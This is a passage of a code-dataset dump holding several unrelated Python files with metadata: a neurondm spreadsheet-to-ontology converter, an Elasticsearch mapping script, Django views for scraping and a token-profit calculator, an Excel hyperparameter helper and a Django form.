doi:\n doi = '10.' 
+ doi.split('.org/10.', 1)[-1]\n elif doi.startswith('doi:'):\n doi = doi[len('doi:'):]\n elif doi.startswith('DOI:'):\n doi = doi[len('DOI:'):]\n return doi\n\n\ndef select_by_curie_rank(results):\n ranking = 'CHEBI', 'UBERON', 'PR', 'NCBIGene', 'NCBITaxon', 'GO', 'SAO', 'NLXMOL'\n def key(result):\n if 'curie' in result:\n curie = result['curie']\n else:\n return len(results) * 3\n\n prefix, _ = curie.split(':')\n if prefix in ranking:\n try:\n return ranking.index(result['curie'])\n except ValueError:\n return len(results) + 1\n else:\n return len(results) * 2\n\n return sorted(results, key=key)[0]\n\n\ndef process_note(raw_note):\n if raw_note is None:\n return None\n p = ilxtr.literatureCitation\n for bit in (b.strip() for b in raw_note.split('\\n') if b.strip()):\n maybe_hypothesis = idFromShareLink(bit)\n if maybe_hypothesis:\n # TODO getDocInfoFromHypothesisId(maybe_hypothesis)\n yield p, rdflib.URIRef(shareLinkFromId(maybe_hypothesis))\n elif 'doi:' in bit or 'DOI:' in bit or 'doi.org' in bit:\n yield p, rdflib.URIRef('https://doi.org/' + normalizeDoi(bit))\n elif bit.startswith('http'): # TODO parse the other things\n yield p, rdflib.URIRef(bit)\n else:\n yield p, rdflib.Literal(bit) # FIXME cull editorial notes\n\n\ndef sheet_to_neurons(values, notes_index, expect_pes):\n # TODO import existing ids to register by label\n sgv = Vocabulary()\n e_config = Config('common-usage-types')\n e_config.load_existing()\n query = oq.OntQuery(oq.plugin.get('rdflib')(e_config.core_graph), instrumented=OntTerm)\n # FIXME clear use case for the remaining bound to whatever query produced it rather\n # than the other way around ... how to support this use case ...\n existing = {str(n.origLabel):n for n in e_config.neurons()}\n def convert_header(header):\n if header.startswith('has'): # FIXME use a closed namespace\n return ilxtr[header]\n else:\n return None\n\n def convert_other(header):\n if header == 'label':\n return rdfs.label\n elif header == 'curie':\n return rdf.type\n elif header == 'definition':\n return definition\n else:\n header = header.replace(' ', '_')\n return TEMP[header] # FIXME\n\n def mapCell(cell, syns=False):\n search_prefixes = ('UBERON', 'CHEBI', 'PR', 'NCBITaxon', 'NCBIGene', 'ilxtr', 'NIFEXT', 'SAO', 'NLXMOL',\n 'BIRNLEX',)\n\n if ':' in cell and ' ' not in cell:\n log.debug(cell)\n if 'http' in cell:\n if cell.startswith('http'):\n t = OntTerm(iri=cell)\n else:\n return None, None # garbage with http inline\n else:\n t = OntTerm(cell, exclude_prefix=('FMA',)) # FIXME need better error message in ontquery\n\n return t.u, t.label\n\n result = [r for r in sgv.findByTerm(cell, searchSynonyms=syns, prefix=search_prefixes)\n if not r['deprecated']]\n #printD(cell, result)\n if not result:\n log.debug(f'{cell}')\n maybe = list(query(label=cell, exclude_prefix=('FMA',)))\n if maybe:\n qr = maybe[0]\n return qr.OntTerm.u, qr.label\n elif not syns:\n return mapCell(cell, syns=True)\n else:\n return None, None\n elif len(result) > 1:\n #printD('WARNING', result)\n result = select_by_curie_rank(result)\n else:\n result = result[0]\n\n return rdflib.URIRef(result['iri']), result['labels'][0]\n\n def lower_check(label, cell):\n return label not in cell and label.lower() not in cell.lower() # have to handle comma sep case\n\n lnlu = {v:k for k, v in LogicalPhenotype.local_names.items()}\n def convert_cell(cell_or_comma_sep):\n #printD('CONVERTING', cell_or_comma_sep)\n for cell_w_junk in cell_or_comma_sep.split(','): # XXX WARNING need a way to alert people to this\n cell = 
cell_w_junk.strip()\n if cell.startswith('(OR') or cell.startswith('(AND'):\n start, *middle, end = cell.split('\" \"')\n OPoperator, first = start.split(' \"')\n operator = OPoperator[1:]\n operator = lnlu[operator]\n last, CP = end.rsplit('\"')\n iris, labels = [], []\n for term in (first, *middle, last):\n iri, label = mapCell(term)\n if label is None:\n label = cell_or_comma_sep\n iris.append(iri)\n labels.append(label)\n\n yield (operator, *iris), tuple(labels)\n\n else:\n iri, label = mapCell(cell)\n if label is None:\n yield iri, cell_or_comma_sep # FIXME need a way to handle this that doesn't break things?\n else:\n yield iri, label\n\n config = Config('cut-roundtrip')\n skip = 'alignment label',\n headers, *rows = values\n errors = []\n new = []\n release = []\n for i, neuron_row in enumerate(rows):\n id = None\n label_neuron = None\n definition_neuron = None\n synonyms_neuron = None\n current_neuron = None\n phenotypes = []\n do_release = False\n predicate_notes = {}\n object_notes = {}\n other_notes = {}\n wat = {}\n for j, (header, cell) in enumerate(zip(headers, neuron_row)):\n notes = list(process_note(get_note(i + 1, j, notes_index))) # + 1 since headers is removed\n if notes and not header.startswith('has'):\n _predicate = convert_other(header)\n if cell:\n _object = rdflib.Literal(cell) # FIXME curies etc.\n else:\n _object = rdf.nil\n other_notes[_predicate, _object] = notes\n\n if header == 'curie':\n id = OntId(cell).u if cell else None\n continue\n elif header == 'label':\n label_neuron = cell\n if cell in existing:\n current_neuron = existing[cell]\n elif cell:\n # TODO\n new.append(cell)\n else:\n raise ValueError(cell) # wat\n continue\n elif header == 'Status':\n # TODO\n if cell == 'Yes':\n do_release = True\n elif cell == 'Maybe':\n pass\n elif cell == 'Not yet':\n pass\n elif cell == 'Delete':\n pass\n else:\n pass\n\n continue\n elif header == 'PMID':\n # TODO\n continue\n elif header == 'Other reference':\n # TODO\n continue\n elif header == 'Other label':\n # TODO\n continue\n elif header == 'definition':\n continue # FIXME single space differences between the spreadsheet and the source\n\n if cell:\n definition_neuron = rdflib.Literal(cell)\n\n continue\n\n elif header == 'synonyms':\n if cell:\n synonyms_neuron = [rdflib.Literal(s.strip())\n # FIXME bare comma is extremely dangerous\n for s in cell.split(',')]\n\n continue\n elif header in skip:\n continue\n\n objects = []\n if cell:\n predicate = convert_header(header)\n if predicate is None:\n log.debug(f'{(header, cell, notes)}')\n\n for object, label in convert_cell(cell):\n if isinstance(label, tuple): # LogicalPhenotype case\n _err = []\n for l in label:\n if lower_check(l, cell):\n _err.append((cell, label))\n if _err:\n errors.extend(_err)\n else:\n objects.append(object)\n elif lower_check(label, cell):\n errors.append((cell, label))\n elif str(id) == object:\n errors.append((header, cell, object, label))\n object = None\n else:\n objects.append(object)\n\n if notes:\n # FIXME this is a hack to only attach to the last value\n # since we can't distinguish at the moment\n wat[predicate, object] = notes\n if object is not None:\n # object aka iri can be none if we don't find anything\n object_notes[object] = notes\n else:\n predicate_notes[predicate] = notes\n # FIXME it might also be simpler in some cases\n # to have this be object_notes[object] = notes\n # because we are much less likely to have the same\n # phenotype appear attached to the different dimensions\n\n # FIXME comma sep is weak here 
because the\n # reference is technically ambiguous\n # might be an argument for the denormalized form ...\n # or perhaps having another sheet for cases like that\n\n else:\n continue\n\n if predicate and objects:\n for object in objects: # FIXME has layer location phenotype\n if isinstance(object, tuple):\n op, *rest = object\n pes = (Phenotype(r, predicate) for r in rest) # FIXME nonhomogeneous phenotypes\n phenotypes.append(LogicalPhenotype(op, *pes))\n elif object:\n phenotypes.append(Phenotype(object, predicate))\n else:\n errors.append((object, predicate, cell))\n elif objects:\n errors.append((header, objects))\n else:\n errors.append((header, cell))\n # translate header -> predicate\n # translate cell value to ontology id\n\n if current_neuron and phenotypes:\n # TODO merge current with changes\n # or maybe we just replace since all the phenotypes should be there?\n log.debug(phenotypes)\n if id is not None:\n log.debug(f'{(id, bool(id))}')\n\n elif label_neuron:\n id = make_cut_id(label_neuron)\n\n if id not in expect_pes:\n log.error(f'{id!r} not in cuts!?')\n continue\n\n if expect_pes[id] != len(phenotypes):\n log.error(f'{id!r} failed roundtrip {len(phenotypes)} != {expect_pes[id]}')\n continue\n\n neuron = NeuronCUT(*phenotypes, id_=id, label=label_neuron,\n override=bool(id) or bool(label_neuron))\n neuron.adopt_meta(current_neuron)\n # FIXME occasionally this will error?!\n else:\n continue # FIXME this pollutes everything ???\n fn = fixname(label_neuron)\n if not phenotypes and i: # i skips header\n errors.append((i, neuron_row)) # TODO special review for phenos but not current\n phenotypes = Phenotype('TEMP:phenotype/' + fn),\n\n neuron = NeuronCUT(*phenotypes,\n id_=make_cut_id(label_neuron),\n label=label_neuron, override=True)\n\n # update the meta if there were any changes\n if definition_neuron is not None:\n neuron.definition = definition_neuron\n\n if synonyms_neuron is not None:\n neuron.synonyms = synonyms_neuron\n\n try:\n neuron.batchAnnotateByObject(object_notes)\n neuron.batchAnnotate(other_notes)\n except AttributeError as e:\n #embed()\n log.exception(e) #'something very strange has happened\\n', e)\n pass # FIXME FIXME FIXME\n\n #neuron.batchAnnotateByPredicate(predicate_notes) # TODO\n # FIXME doesn't quite work in this context, but there are other\n # cases where annotations to the general modality are still desirable\n # FIXME there may be no predicate? 
if the object fails to match?\n\n if do_release:\n release.append(neuron)\n\n return config, errors, new, release\n\n\nclass Cuts(Sheet):\n name = 'neurons-cut'\n\n\nclass CutsV1(Cuts):\n sheet_name = 'CUT V1.0'\n fetch_grid = True\n\n\ndef main():\n #from neurondm.models.cuts import main as cuts_main\n #cuts_config, *_ = cuts_main()\n from IPython import embed\n from neurondm.compiled.common_usage_types import config as cuts_config\n cuts_neurons = cuts_config.neurons()\n expect_pes = {n.id_:len(n.pes) for n in cuts_neurons}\n\n sheet = CutsV1()\n config, errors, new, release = sheet_to_neurons(sheet.values, sheet.notes_index, expect_pes)\n #sheet.show_notes()\n config.write_python()\n config.write()\n #config = Config(config.name)\n #config.load_existing() # FIXME this is a hack to get a load_graph\n from neurondm import Config, NeuronCUT\n release_config = Config('cut-release')\n [NeuronCUT(*n, id_=n.id_, label=n.origLabel, override=True).adopt_meta(n) for n in release]\n release_config.write_python()\n release_config.write()\n from neurondm.models.cuts import export_for_review\n review_rows = export_for_review(config, [], [], [], filename='cut-rt-test.csv', with_curies=True)\n from pyontutils.utils import byCol\n valuesC = byCol(sheet.values[1:],\n header=[v.replace(' ', '_') for v in sheet.values[0]],\n to_index=['label'])\n reviewC = byCol(review_rows[1:], header=[v.replace(' ', '_') for v in review_rows[0]], to_index=['label'])\n def grow(r):\n log.debug(r)\n # TODO implement on the object to allow joining on an index?\n # man this would be easier with sql >_< probably pandas too\n # but so many dependencies ... also diffing issues etc\n return valuesC.searchIndex('label', r.label)\n\n def key(field_value):\n field, value = field_value\n try:\n return valuesC.header._fields.index(field) # TODO warn on field mismatch\n except ValueError as e:\n print('ERROR!!!!!!!!!!!', field, value)\n return None\n\n def replace(r, *cols):\n \"\"\" replace and reorder \"\"\"\n # FIXME _super_ inefficient\n vrow = grow(r)\n for field, value in sorted(zip(r._fields, r), key=key):\n if field in cols:\n value = getattr(vrow, field)\n\n yield '' if value is None else value # completely overwrite the sheet\n\n rows = [list(replace(r, 'Status', 'definition', 'synonyms', 'PMID')) for r in reviewC]\n #resp = update_sheet_values('neurons-cut', 'Roundtrip', rows)\n embed()\n\nif __name__ == '__main__':\n main()\n", "sub_path": "neurondm/neurondm/sheets.py", "file_name": "sheets.py", "file_ext": "py", "file_size_in_byte": 16233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pyontutils.namespaces.ilxtr.literatureCitation", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pyontutils.namespaces.ilxtr", "line_number": 46, "usage_type": "name"}, {"api_name": "hyputils.hypothesis.idFromShareLink", "line_number": 48, "usage_type": "call"}, {"api_name": "rdflib.URIRef", "line_number": 51, "usage_type": "call"}, {"api_name": "hyputils.hypothesis.shareLinkFromId", "line_number": 51, "usage_type": "call"}, {"api_name": "rdflib.URIRef", "line_number": 53, "usage_type": "call"}, {"api_name": "rdflib.URIRef", "line_number": 55, "usage_type": "call"}, {"api_name": "rdflib.Literal", "line_number": 57, "usage_type": "call"}, {"api_name": "pyontutils.scigraph.Vocabulary", "line_number": 62, "usage_type": "call"}, {"api_name": "neurondm.Config", "line_number": 63, "usage_type": "call"}, {"api_name": "ontquery.OntQuery", "line_number": 
65, "usage_type": "call"}, {"api_name": "ontquery.plugin.get", "line_number": 65, "usage_type": "call"}, {"api_name": "ontquery.plugin", "line_number": 65, "usage_type": "attribute"}, {"api_name": "neurondm.core.OntTerm", "line_number": 65, "usage_type": "name"}, {"api_name": "pyontutils.namespaces.ilxtr", "line_number": 71, "usage_type": "name"}, {"api_name": "pyontutils.closed_namespaces.rdfs.label", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pyontutils.closed_namespaces.rdfs", "line_number": 77, "usage_type": "name"}, {"api_name": "pyontutils.closed_namespaces.rdf.type", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pyontutils.closed_namespaces.rdf", "line_number": 79, "usage_type": "name"}, {"api_name": "pyontutils.namespaces.definition", "line_number": 81, "usage_type": "name"}, {"api_name": "pyontutils.namespaces.TEMP", "line_number": 84, "usage_type": "name"}, {"api_name": "neurondm.core.log.debug", "line_number": 91, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 91, "usage_type": "name"}, {"api_name": "neurondm.core.OntTerm", "line_number": 94, "usage_type": "call"}, {"api_name": "neurondm.core.OntTerm", "line_number": 98, "usage_type": "call"}, {"api_name": "neurondm.core.log.debug", "line_number": 106, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 106, "usage_type": "name"}, {"api_name": "rdflib.URIRef", "line_number": 121, "usage_type": "call"}, {"api_name": "neurondm.LogicalPhenotype.local_names.items", "line_number": 126, "usage_type": "call"}, {"api_name": "neurondm.LogicalPhenotype.local_names", "line_number": 126, "usage_type": "attribute"}, {"api_name": "neurondm.LogicalPhenotype", "line_number": 126, "usage_type": "name"}, {"api_name": "neurondm.Config", "line_number": 154, "usage_type": "call"}, {"api_name": "pyontutils.sheets.get_note", "line_number": 173, "usage_type": "call"}, {"api_name": "rdflib.Literal", "line_number": 177, "usage_type": "call"}, {"api_name": "pyontutils.closed_namespaces.rdf.nil", "line_number": 179, "usage_type": "attribute"}, {"api_name": "pyontutils.closed_namespaces.rdf", "line_number": 179, "usage_type": "name"}, {"api_name": "neurondm.core.OntId", "line_number": 183, "usage_type": "call"}, {"api_name": "rdflib.Literal", "line_number": 222, "usage_type": "call"}, {"api_name": "rdflib.Literal", "line_number": 228, "usage_type": "call"}, {"api_name": "neurondm.core.log.debug", "line_number": 240, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 240, "usage_type": "name"}, {"api_name": "neurondm.Phenotype", "line_number": 286, "usage_type": "call"}, {"api_name": "neurondm.LogicalPhenotype", "line_number": 287, "usage_type": "call"}, {"api_name": "neurondm.Phenotype", "line_number": 289, "usage_type": "call"}, {"api_name": "neurondm.core.log.debug", "line_number": 302, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 302, "usage_type": "name"}, {"api_name": "neurondm.core.log.debug", "line_number": 304, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 304, "usage_type": "name"}, {"api_name": "neurondm.models.cuts.make_cut_id", "line_number": 307, "usage_type": "call"}, {"api_name": "neurondm.core.log.error", "line_number": 310, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 310, "usage_type": "name"}, {"api_name": "neurondm.core.log.error", "line_number": 314, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 314, "usage_type": "name"}, {"api_name": 
"neurondm.NeuronCUT", "line_number": 317, "usage_type": "call"}, {"api_name": "neurondm.models.cuts.fixname", "line_number": 323, "usage_type": "call"}, {"api_name": "neurondm.Phenotype", "line_number": 326, "usage_type": "call"}, {"api_name": "neurondm.NeuronCUT", "line_number": 328, "usage_type": "call"}, {"api_name": "neurondm.models.cuts.make_cut_id", "line_number": 329, "usage_type": "call"}, {"api_name": "neurondm.core.log.exception", "line_number": 344, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 344, "usage_type": "name"}, {"api_name": "pyontutils.sheets.Sheet", "line_number": 358, "usage_type": "name"}, {"api_name": "neurondm.compiled.common_usage_types.config.neurons", "line_number": 372, "usage_type": "call"}, {"api_name": "neurondm.compiled.common_usage_types.config", "line_number": 372, "usage_type": "name"}, {"api_name": "neurondm.Config", "line_number": 383, "usage_type": "call"}, {"api_name": "neurondm.NeuronCUT", "line_number": 384, "usage_type": "call"}, {"api_name": "neurondm.models.cuts.export_for_review", "line_number": 388, "usage_type": "call"}, {"api_name": "pyontutils.utils.byCol", "line_number": 390, "usage_type": "call"}, {"api_name": "pyontutils.utils.byCol", "line_number": 393, "usage_type": "call"}, {"api_name": "neurondm.core.log.debug", "line_number": 395, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 395, "usage_type": "name"}, {"api_name": "IPython.embed", "line_number": 421, "usage_type": "call"}]} +{"seq_id": "538531912", "text": "# -*- coding:UTF-8 -*-\nimport json\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import scan\n\nindex_info = {\n 'settings':{\n 'number_of_shards':5,\n 'number_of_replicas':0,\n },\n 'mappings':{\n 'group':{\n 'properties':{\n 'task_name':{\n 'type':'string',\n 'index': 'not_analyzed'\n },\n 'state':{\n 'type':'string',\n 'index': 'not_analyzed'\n },\n 'status':{\n 'type':'long'\n },\n 'submit_date':{\n 'type':'string',\n 'index': 'not_analyzed'\n }\n }\n }\n }\n }\n\nes = Elasticsearch('219.224.135.93')\n\nes.indices.create(index='group_result', body=index_info, ignore=400)\n\n", "sub_path": "user_portrait/group_result_mappings.py", "file_name": "group_result_mappings.py", "file_ext": "py", "file_size_in_byte": 922, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "elasticsearch.Elasticsearch", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "258601220", "text": "from django.shortcuts import render\nfrom .models import Analysis\n# Create your views here.\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nr = requests.get(\n 'https://www.n11.com/telefon-ve-aksesuarlari')\nsoup = BeautifulSoup(r.content, \"lxml\")\ntitle = soup.find_all(\"h3\", class_=\"productName\")\ntits = []\n\nfor tit in title:\n tits.append(tit.text)\n\n\ndef analysis(request):\n context = {'tits': tits}\n return render(request, 'analysis.html', context)\n\n\ndef basabas(request):\n context = {}\n return render(request, 'basabas.html', context)\n", "sub_path": "analysis/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 553, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 10, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}, {"api_name": 
"django.shortcuts.render", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "553204166", "text": "from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import redirect, render\nfrom django.template import loader\nfrom django.http import HttpResponse\nfrom django import template\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\nimport os, math\n\ncur_path = dirname(__file__)\nenv_path = cur_path[:cur_path.rfind(os.path.sep)] \ndotenv_path = join(env_path, '.env')\nload_dotenv(dotenv_path)\nprint(\"### \" + dotenv_path + \" ##\")\n\ncontext = {}\n\ncontext['TOKEN_APR_MIN'] = float(os.environ.get('TOKEN_APR_MIN'))\ncontext['TOKEN_APR_MAX'] = float(os.environ.get('TOKEN_APR_MAX'))\ncontext['GAS_FEE_MIN'] = float(os.environ.get('GAS_FEE_MIN'))\ncontext['GAS_FEE_MAX'] = float(os.environ.get('GAS_FEE_MAX'))\ncontext['TIME_HORIZON_DAYS_MIN'] = int(os.environ.get('TIME_HORIZON_DAYS_MIN'))\ncontext['TIME_HORIZON_DAYS_MAX'] = int(os.environ.get('TIME_HORIZON_DAYS_MAX'))\ncontext['TOKEN_START_COUNT_MIN'] = float(os.environ.get('TOKEN_START_COUNT_MIN'))\ncontext['TOKEN_START_COUNT_MAX'] = float(os.environ.get('TOKEN_START_COUNT_MAX'))\ncontext['TOKEN_START_PRICE_MIN'] = float(os.environ.get('TOKEN_START_PRICE_MIN'))\ncontext['TOKEN_START_PRICE_MAX'] = float(os.environ.get('TOKEN_START_PRICE_MAX'))\ncontext['TOKEN_END_PRICE_MIN'] = float(os.environ.get('TOKEN_END_PRICE_MIN'))\ncontext['TOKEN_END_PRICE_MAX'] = float(os.environ.get('TOKEN_END_PRICE_MAX'))\n\n\ndef index(request):\n global dotenv_path\n\n if \"ta\" in request.GET :\n context['TOKEN_APR_FROM'] = request.GET[\"ta\"]\n else:\n context['TOKEN_APR_FROM'] = (context['TOKEN_APR_MIN'] + context['TOKEN_APR_MAX']) / 2\n\n if \"gf\" in request.GET :\n context['GAS_FEE_FROM'] = request.GET[\"gf\"]\n else:\n context['GAS_FEE_FROM'] = (context['GAS_FEE_MIN'] + context['GAS_FEE_MAX']) / 2\n\n if \"th\" in request.GET :\n context['TIME_HORIZON_DAYS_FROM'] = request.GET[\"th\"]\n else:\n context['TIME_HORIZON_DAYS_FROM'] = (context['TIME_HORIZON_DAYS_MIN'] + context['TIME_HORIZON_DAYS_MAX']) // 2\n\n if \"tsc\" in request.GET :\n context['TOKEN_START_COUNT_FROM'] = request.GET[\"tsc\"]\n else:\n context['TOKEN_START_COUNT_FROM'] = (context['TOKEN_START_COUNT_MIN'] + context['TOKEN_START_COUNT_MAX']) / 2\n\n if \"tsp\" in request.GET :\n context['TOKEN_START_PRICE_FROM'] = request.GET[\"tsp\"]\n else:\n context['TOKEN_START_PRICE_FROM'] = (context['TOKEN_START_PRICE_MIN'] + context['TOKEN_START_PRICE_MAX']) / 2\n\n if \"tep\" in request.GET :\n context['TOKEN_END_PRICE_FROM'] = request.GET[\"tep\"]\n else:\n context['TOKEN_END_PRICE_FROM'] = (context['TOKEN_END_PRICE_MIN'] + context['TOKEN_END_PRICE_MAX']) / 2\n\n \n html_template = loader.get_template( 'index.html' )\n return HttpResponse(html_template.render(context, request))\n\ndef calc(request):\n print(request.GET['ta'])\n TOKEN_APR = float(request.GET['ta'])\n print(TOKEN_APR)\n GAS_FEE = float(request.GET['gf'])\n print(GAS_FEE)\n TIME_HORIZON_DAYS = int(request.GET['th'])\n print(TIME_HORIZON_DAYS)\n TOKEN_START_COUNT = float(request.GET['tsc'])\n TOKEN_START_PRICE = float(request.GET['tsp'])\n TOKEN_END_PRICE = float(request.GET['tep'])\n\n max_profit, max_deposit_frequency, max_token_count = (0, 0, 0)\n profits = []\n profits.append(0)\n for deposit_frequency in range(1, TIME_HORIZON_DAYS + 1):\n token_count = TOKEN_START_COUNT\n fee_balance = 0\n token_start_balance = token_count * TOKEN_START_PRICE\n \n token_count = token_count * ((1 + 
TOKEN_APR * deposit_frequency/100/TIME_HORIZON_DAYS)**(TIME_HORIZON_DAYS // deposit_frequency)) * (1 + TOKEN_APR * (TIME_HORIZON_DAYS % deposit_frequency)/100/TIME_HORIZON_DAYS)\n fee_balance = GAS_FEE * math.ceil(TIME_HORIZON_DAYS / deposit_frequency)\n token_end_balance = token_count * TOKEN_END_PRICE\n profit = token_end_balance - fee_balance - token_start_balance\n profits.append(str(profit))\n\n if deposit_frequency == 1:\n max_profit = profit\n max_deposit_frequency = deposit_frequency\n max_token_count = token_count\n elif profit > max_profit :\n max_profit = profit\n max_deposit_frequency = deposit_frequency\n max_token_count = token_count\n\n \n profits[0] = str(max_deposit_frequency) + \"_\" + str(max_token_count)\n return HttpResponse(\",\".join(profits))\n #\n", "sub_path": "calculator/calculator/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4416, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.dirname", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 18, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 20, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 21, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 22, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 23, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 24, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 26, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 27, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 28, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 29, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "django.template.loader.get_template", "line_number": 66, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 66, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 67, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 90, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "55966972", "text": "\"\"\"\n# Read an Excel file and get 
hyperparameters\n\nFrom https://openpyxl.readthedocs.io/en/stable/pandas.html\n\nAssumptions:\n - You are running it from scratch. It will read all of the hyperparameters\n - Manually set wb.Hyperparameters.Done = True when done (ideally automatic)\n\n\"\"\"\nfrom openpyxl import load_workbook\nfrom itertools import islice\nimport pandas as pd\n\n\ndef read_hyperparameters(xlsx_path, worksheet: str = 'Hyperparameters'):\n \"\"\"\n Read the Hyperparameters from a spreadsheet\n - Taken from https://openpyxl.readthedocs.io/en/stable/pandas.html\n\n :param xlsx_path: str - path to xlsx worksheet\n :param worksheet: str - name of Hyperparameter worksheet\n :return: pd.DataFrame - Pandas dataframe of info\n \"\"\"\n\n wb = load_workbook(filename=xlsx_path)\n ws = wb[worksheet]\n wb.close()\n\n # From Documentation\n data = ws.values\n # First row is column names\n cols = next(data)[1:]\n # Extract Data Fields\n data = list(data)\n # Index is first column of data\n idx = [r[0] for r in data]\n data = (islice(r, 1, None) for r in data)\n df = pd.DataFrame(data, index=idx, columns=cols)\n\n return df\n\n\ndef write_results(results, xlsx_path, worksheet: str = 'Results'):\n \"\"\"\n Write results\n :param results: dict - {'Trial': 1, 'Train Acc': 0.883, 'Train Loss': 0.546, 'Valid Acc':, 'Valid Loss':,\n 'Test Acc':, 'Test Loss':}\n :param xlsx_path:\n :param worksheet:\n :return:\n \"\"\"\n # Open and Read\n wb = load_workbook(filename=xlsx_path)\n ws = wb[worksheet]\n\n # Append Row\n trial = results.get('Trial', None)\n tr_acc = results.get('Train Acc', None)\n tr_loss = results.get('Train Loss', None)\n v_acc = results.get('Valid Acc', None)\n v_loss = results.get('Valid Loss', None)\n t_acc = results.get('Test Acc', None)\n t_loss = results.get('Test Loss', None)\n\n ws.append((trial, tr_acc, tr_loss, v_acc, v_loss, t_acc, t_loss))\n\n # Save and Close\n wb.save(filename=xlsx_path)\n wb.close()\n\n\nif __name__ == '__main__':\n xlsx_path = '../$ scrap_data/test.xlsx'\n df = read_hyperparameters(xlsx_path)\n\n results = {'Trial': 1, 'Train Acc': 0.883, 'Train Loss': 0.546, 'Valid Acc': 0.797, 'Valid Loss': 0.721,\n 'Test Acc': 0.657, 'Test Loss': 1.043}\n write_results(results, xlsx_path)\n\n\n\n", "sub_path": "library/training/hyperparameter.py", "file_name": "hyperparameter.py", "file_ext": "py", "file_size_in_byte": 2319, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "openpyxl.load_workbook", "line_number": 26, "usage_type": "call"}, {"api_name": "itertools.islice", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "615942124", "text": "from django import forms\nimport numpy as np\nimport re\n\nVALUES = [\n ('48000', '48000'),\n ('41000', '41000'),\n ]\n\nPLAYBACK = np.arange(0.5, 3, 0.5)\nPLAYBACK = zip(PLAYBACK.tolist(), PLAYBACK.tolist())\n\n\nclass InputParm(forms.Form):\n frame_rate = forms.IntegerField(widget=forms.Select(choices=VALUES), initial=48000)\n frame_quality = forms.IntegerField(initial=3)\n frame_margin = forms.IntegerField(initial=5)\n playback_speed = forms.FloatField(widget=forms.Select(choices=PLAYBACK), initial=1)\n silent_speed = forms.IntegerField(initial=100)\n silence_threshold = forms.FloatField(initial=0.03)\n\n def __init__(self, *args, **kwargs):\n super(InputParm, self).__init__(*args, **kwargs) # Call to ModelForm 
